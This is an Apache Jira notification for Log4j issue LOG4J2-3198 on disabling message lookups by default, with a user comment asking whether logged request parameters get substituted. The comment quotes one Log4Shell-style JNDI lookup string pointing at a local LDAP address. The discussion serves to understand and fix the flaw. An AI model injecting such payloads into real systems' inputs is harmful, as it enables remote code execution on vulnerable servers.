[ https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457298#comment-17457298 ]
Eric Everman commented on LOG4J2-3198: -------------------------------------- Is there any possible configuration where the text of substituted parameters are substituted? For instance: {code:java} logger.debug("User entered '{}', which is invalid", request.getParameter());{code} and 'request.getParameter()' returns something like: {code:java} ${jndi:ldap://127.0.0.1:1389/a}{code} ?? > Message lookups should be disabled by default > --------------------------------------------- > > Key: LOG4J2-3198 > URL: https://issues.apache.org/jira/browse/LOG4J2-3198 > Project: Log4j 2 > Issue Type: Improvement > Components: Layouts > Affects Versions: 2.14.1 > Reporter: Carter Kozak > Assignee: Carter Kozak > Priority: Major > Fix For: 2.15.0 > > > Lookups in messages are confusing, and muddy the line between logging APIs > and implementation. Given a particular API, there's an expectation that a > particular shape of call will result in specific results. However, lookups in > messages can be passed into JUL and will result in resolved output in log4j > formatted output, but not any other implementations despite no direct > dependency on those implementations. > There's also a cost to searching formatted message strings for particular > escape sequences which define lookups. This feature is not used as far as > we've been able to tell searching github and stackoverflow, so it's > unnecessary for every log event in every application to burn several cpu > cycles searching for the value. -- This message was sent by Atlassian Jira (v8.20.1#820001)